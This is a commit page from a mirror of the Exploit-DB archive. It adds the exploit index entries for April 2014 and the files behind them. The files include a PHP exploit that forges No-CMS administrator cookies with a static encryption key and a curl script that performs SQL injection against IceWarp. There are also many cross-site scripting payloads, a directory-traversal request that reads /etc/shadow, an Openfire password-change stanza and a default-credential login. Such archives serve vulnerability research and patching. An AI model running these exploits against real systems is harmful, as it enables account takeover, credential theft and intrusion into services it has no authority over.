bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_23_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-23 04:35:22 +00:00
parent ef56e24142
commit 038ba787cc
24 changed files with 847 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -29612,7 +29612,7 @@ id,file,description,date,author,platform,type,port
32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
@ -29693,6 +29693,7 @@ id,file,description,date,author,platform,type,port
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability",2014-04-20,"Rakesh S",hardware,webapps,0
32944,platforms/multiple/remote/32944.txt,"SAP cFolders Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-21,"Digital Security Research Group",multiple,remote,0
32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0
32946,platforms/freebsd/local/32946.c,"FreeBSD <= 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability",2009-01-15,"Jaakko Heinonen",freebsd,local,0
32947,platforms/linux/local/32947.txt,"DirectAdmin <= 1.33.3 '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability",2009-04-22,anonymous,linux,local,0
32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 'admin/control_panel_sample.php' SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0
@ -29706,3 +29707,24 @@ id,file,description,date,author,platform,type,port
32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service Vulnerability",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0
32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability",2009-04-27,"Alfons Luja",windows,remote,0
32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0
32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0
32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0
32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability",2009-04-27,"Marc Gueury",linux,dos,0
32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass Vulnerability",2009-04-29,J.Greil,cgi,remote,0
32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery <= 1.4.21 'css' Parameter Cross-Site Scripting Vulnerability",2009-04-29,"Gerendi Sandor Attila",php,webapps,0
32964,platforms/linux/dos/32964.c,"GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS",2009-04-30,"Miroslav Kratochvil",linux,dos,0
32965,platforms/linux/remote/32965.c,"GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote,0
32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0
32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability",2009-05-04,"Daryl Herzmann",multiple,remote,0
32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0
32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 'cleanHTML()' Function Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0
32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0

Can't render this file because it is too large.

36
platforms/cgi/remote/32962.txt Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/34760/info
LevelOne AMG-2000 is prone to a security-bypass vulnerability.
Attackers may exploit this issue to gain access to the administrative interface and internal computers from an outside network. This may aid in further attacks.
Note that valid authentication credentials must still be provided to authenticate to the device's administrative interface. Attackers may use default accounts such as 'operator' or 'manager' if the default passwords have not been changed.
LevelOne AMG-2000 running firmware 2.00.00build00600 and prior versions are affected.
The following examples are available:
HTTP request to access the administration interface login page from the WLAN
GET http://127.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]
HTTP request to login to the admin interface with the user "manager"
POST http://127.0.0.1/check.shtml HTTP/1.1
Host: 192.168.0.1:2128
[...]
username=manager&password=manager&Submit=ENTER
HTTP request to access other internal IP addresses configured on the private LAN port
GET http://10.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]

2
platforms/hardware/webapps/32859.txt
View file

@ -1,4 +1,4 @@
# Title : Sagem F@st 3304-V2 Authentification Bypass
# Title : Sagem F@st 3304-V2 Authentication Bypass
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested on : Firefox, Google Chrome, Internet Explorer

42
platforms/hardware/webapps/32973.txt Executable file
View file

@ -0,0 +1,42 @@
#Exploit Title: Sixnet sixview web console directory traversal
#Date: 2014-04-21
#Exploit Author: daniel svartman
#Vendor Homepage: www.sixnet.com
#Software Link: Not available, hardware piece - appliance
#Version: 2.4.1
#Tested on: Sixnet Sixview web console (Linux based appliance)
#CVE : 2014-2976
PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
These requests can be received either through GET or POST requests.
I discovered that GET requests are not validated at the server side,
allowing an attacker to request arbitrary files from the supporting OS.
Below is an example of the affected URL and the received answer using
netcat:
ncat <HOSTNAME> 18081
GET /../../../../../../../../../../etc/shadow HTTP/1.1
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Keep-Alive: timeout=15, max=50
Date: <SNIP>
Last-Modified: <SNIP>
Content-Length: 1025
root:<REMOVED>:15655:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
<SNIP>

7
platforms/linux/dos/32961.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34743/info
Mozilla Firefox is prone to a remote memory-corruption vulnerability.
Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users.
<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html>

92
platforms/linux/dos/32964.c Executable file
View file

@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/34783/info
GnuTLS is prone to multiple remote vulnerabilities:
- A remote code-execution vulnerability
- A denial-of-service vulnerability
- A signature-generation vulnerability
- A signature-verification vulnerability
An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
Versions prior to GnuTLS 2.6.6 are vulnerable.
/*
* Small code to reproduce the CVE-2009-1415 double-free problem.
*
* Build it using:
*
* gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls
*
* If your gnutls library is OK then running it will just print 'success!'.
*
* If your gnutls library is buggy, then running it will crash like this:
*
* ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***
* ======= Backtrace: =========
* ...
*/
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <gnutls/gnutls.h>
static char dsa_cert[] =
"-----BEGIN CERTIFICATE-----\n"
"MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\n"
"VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\n"
"GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\n"
"Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\n"
"dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\n"
"IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\n"
"WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\n"
"15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\n"
"xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\n"
"e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\n"
"VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\n"
"ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\n"
"DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\n"
"dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\n"
"gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\n"
"HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\n"
"x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\n"
"o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\n"
"QcDzQ8REwidsfh9uKAluk1c/KQ==\n"
"-----END CERTIFICATE-----\n";
const gnutls_datum_t dsa_cert_dat = {
dsa_cert, sizeof (dsa_cert)
};
int
main (void)
{
gnutls_x509_crt_t crt;
gnutls_datum_t data = { "foo", 3 };
gnutls_datum_t sig = { "bar", 3 };
int ret;
gnutls_global_init ();
ret = gnutls_x509_crt_init (&crt);
if (ret < 0)
return 1;
ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);
if (ret < 0)
return 1;
ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);
if (ret < 0)
return 1;
printf ("success!\n");
gnutls_x509_crt_deinit (crt);
gnutls_global_deinit ();
return 0;
}

73
platforms/linux/remote/32965.c Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/34783/info
GnuTLS is prone to multiple remote vulnerabilities:
- A remote code-execution vulnerability
- A denial-of-service vulnerability
- A signature-generation vulnerability
- A signature-verification vulnerability
An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
Versions prior to GnuTLS 2.6.6 are vulnerable.
/*
* Small code to reproduce the CVE-2009-1416 bad DSA key problem.
*
* Build it using:
*
* gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls
*
* If your gnutls library is OK then running it will print 'success!'.
*
* If your gnutls library is buggy then running it will print 'buggy'.
*
*/
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <gcrypt.h>
#include <gnutls/gnutls.h>
int
main (void)
{
gnutls_x509_privkey_t key;
gnutls_datum_t p, q, g, y, x;
int ret;
gnutls_global_init ();
gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);
ret = gnutls_x509_privkey_init (&key);
if (ret < 0)
return 1;
ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);
if (ret < 0)
return 1;
ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);
if (ret < 0)
return 1;
if (q.size == 3 && memcmp (q.data, "\x01\x00\x01", 3) == 0)
printf ("buggy\n");
else
printf ("success!\n");
gnutls_free (p.data);
gnutls_free (q.data);
gnutls_free (g.data);
gnutls_free (y.data);
gnutls_free (x.data);
gnutls_x509_privkey_deinit (key);
gnutls_global_deinit ();
return 0;
}

11
platforms/multiple/remote/32945.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34662/info
010 Editor is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
UPDATE (April 22, 2009): Since script files and templates may include script code used to automate editor functions, the privilege gained by a successful exploit is disputed. Please see the references for more information. We will update this BID as more information emerges.
Versions prior to 010 Editor 3.0.5 are vulnerable.
http://www.exploit-db.com/sploits/32945.zip

14
platforms/multiple/remote/32967.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34804/info
Openfire is prone to a vulnerability that can permit an attacker to change the password of arbitrary users.
Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims' accounts.
Versions prior to Openfire 3.6.4 are vulnerable.
<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>

9
platforms/multiple/remote/32971.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/applications/applications.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32974.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/configuration/configuration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32975.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/customMBeans/customMBeans.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32977.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/resourceNode/resources.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32978.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/sysnet/registration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32979.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/webService/webServicesGeneral.jsf?&#039;);};alert("DSecRG_XSS");</script><!--

9
platforms/multiple/remote/32980.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>

9
platforms/multiple/remote/32981.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>

13
platforms/php/webapps/32960.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34725/info
Invision Power Board is prone to an information-disclosure issue and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to determine path information or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; this may aid in other attacks.
Invision Power Board 3.0.0b5 is vulnerable; other versions may also be affected.
The following example data and URI are available:
[email]qwe@[twitter]dodo style=`top:expr/* */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]example.com[/email]
http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=

9
platforms/php/webapps/32963.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34782/info
Coppermine Photo Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Coppermine Photo Gallery 1.4.22 are vulnerable.
http://www.example.com/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt>

9
platforms/php/webapps/32966.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34798/info
MyBB is prone to multiple security vulnerabilities, including an HTML-injection issue and an unspecified issue.
An attacker may leverage the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and to launch other attacks.
MyBB 1.4.5 is vulnerable; other versions may also be affected.
http://www.example.com/somefile.png?"><script>alert('xss')</script>

35
platforms/php/webapps/32968.sh Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/34820/info
IceWarp Merak Mail Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
IceWarp Merak Mail Server 9.4.1 is affected; other versions may be vulnerable as well.
#!/bin/sh
sid=$1
uid=$2
orderby=$3
if [ -n "$4" ] ; then
sql=$4
else
sql="1=0)/*"
fi
curl --silent -d '<iq sid="'$sid'" type="get" format="json">
<query xmlns="webmail:iq:items">
<account uid="'$uid'">
<folder uid="Files">
<item><values><evntitle></evntitle></values>
<filter><offset></offset><limit></limit>
<order_by>'"$orderby"'</order_by>
<sql>'"$sql"'</sql>
</filter>
</item>
</folder>
</account>
</query>
</iq>' https://example.com/webmail/server/webmail.php | \
perl -pe 's/{/\n/g' | grep "result::" | \
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'

7
platforms/php/webapps/32969.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34823/info
IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
<img src=&#x26;&#x23;&#x78;&#x36;&#x61;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3b;&#x26;&#x23;&#x78; &#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23; &#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26; &#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b; &#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61; &#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78; &#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23; &#x78;&#x32;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x34;&#x3b;&#x26; &#x23;&#x78;&#x33;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x39;&#x3b;>

282
platforms/php/webapps/32976.php Executable file
View file

@ -0,0 +1,282 @@
<?php
/*
*
* Static encryption_key of No-CMS lead to Session Array Injection in order to
* hijack administrator account then you will be able for upload php files to
* server via theme/module upload.
*
* This exploit generates cookie for administrator access from non-privileges cookie.
*
* Full analysis can be found following link.
* http://www.mehmetince.net/codeigniter-based-no-cms-admin-account-hijacking-rce-via-static-encryption-key/
*
* TIMELINE
*
* Apr 21, 2014 at 20:17 PM = Vulnerability found.
* Apr 22, 2014 at 1:27 AM = First contact with no-cms developers.
* Apr 22, 2014 at 1:31 AM = Response from no-cms developer.
* Apr 22, 2014 at 2:29AM = Vulnerability confirmed by developers.
* Apr 22, 2014 at 04:37 = Vulnerability has been patch via following commit.
* https://github.com/goFrendiAsgard/No-CMS/commit/39d6ed327330e94b7a76a04042665dd13f2162bd
*/
define('KEY', 'namidanoregret');
define('KEYWORD', 'session_id');
function log_message($type = 'debug', $str){
echo PHP_EOL."[".$type."] ".$str;
}
function show_error($str){
echo PHP_EOL."[error] ".$str.PHP_EOL;
exit(0);
}
function _print($str){
log_message("info", $str.PHP_EOL);
}
class CI_Encrypt {
public $encryption_key = '';
protected $_hash_type = 'sha1';
protected $_mcrypt_exists = FALSE;
protected $_mcrypt_cipher;
protected $_mcrypt_mode;
public function __construct()
{
$this->_mcrypt_exists = function_exists('mcrypt_encrypt');
log_message('debug', 'Encrypt Class Initialized');
}
public function get_key($key = '')
{
return md5($this->encryption_key);
}
public function set_key($key = '')
{
$this->encryption_key = $key;
return $this;
}
public function encode_from_legacy($string, $legacy_mode = MCRYPT_MODE_ECB, $key = '')
{
if ($this->_mcrypt_exists === FALSE)
{
log_message('error', 'Encoding from legacy is available only when Mcrypt is in use.');
return FALSE;
}
elseif (preg_match('/[^a-zA-Z0-9\/\+=]/', $string))
{
return FALSE;
}
$current_mode = $this->_get_mode();
$this->set_mode($legacy_mode);
$key = $this->get_key($key);
$dec = base64_decode($string);
if (($dec = $this->mcrypt_decode($dec, $key)) === FALSE)
{
$this->set_mode($current_mode);
return FALSE;
}
$dec = $this->_xor_decode($dec, $key);
$this->set_mode($current_mode);
return base64_encode($this->mcrypt_encode($dec, $key));
}
public function _xor_encode($string, $key = '')
{
if($key === '')
$key = $this->get_key();
$rand = '';
do
{
$rand .= mt_rand();
}
while (strlen($rand) < 32);
$rand = $this->hash($rand);
$enc = '';
for ($i = 0, $ls = strlen($string), $lr = strlen($rand); $i < $ls; $i++)
{
$enc .= $rand[($i % $lr)].($rand[($i % $lr)] ^ $string[$i]);
}
return $this->_xor_merge($enc, $key);
}
public function _xor_decode($string, $key = '')
{
if($key === '')
$key = $this->get_key();
$string = $this->_xor_merge($string, $key);
$dec = '';
for ($i = 0, $l = strlen($string); $i < $l; $i++)
{
$dec .= ($string[$i++] ^ $string[$i]);
}
return $dec;
}
protected function _xor_merge($string, $key)
{
$hash = $this->hash($key);
$str = '';
for ($i = 0, $ls = strlen($string), $lh = strlen($hash); $i < $ls; $i++)
{
$str .= $string[$i] ^ $hash[($i % $lh)];
}
return $str;
}
public function mcrypt_encode($data, $key = '')
{
if($key === '')
$key = $this->get_key();
$init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
$init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND);
return $this->_add_cipher_noise($init_vect.mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key);
}
public function mcrypt_decode($data, $key = '')
{
if($key === '')
$key = $this->get_key();
$data = $this->_remove_cipher_noise($data, $key);
$init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode());
if ($init_size > strlen($data))
{
return FALSE;
}
$init_vect = substr($data, 0, $init_size);
$data = substr($data, $init_size);
return rtrim(mcrypt_decrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), "\0");
}
protected function _add_cipher_noise($data, $key)
{
$key = $this->hash($key);
$str = '';
for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
{
if ($j >= $lk)
{
$j = 0;
}
$str .= chr((ord($data[$i]) + ord($key[$j])) % 256);
}
return $str;
}
protected function _remove_cipher_noise($data, $key)
{
$key = $this->hash($key);
$str = '';
for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j)
{
if ($j >= $lk)
{
$j = 0;
}
$temp = ord($data[$i]) - ord($key[$j]);
if ($temp < 0)
{
$temp += 256;
}
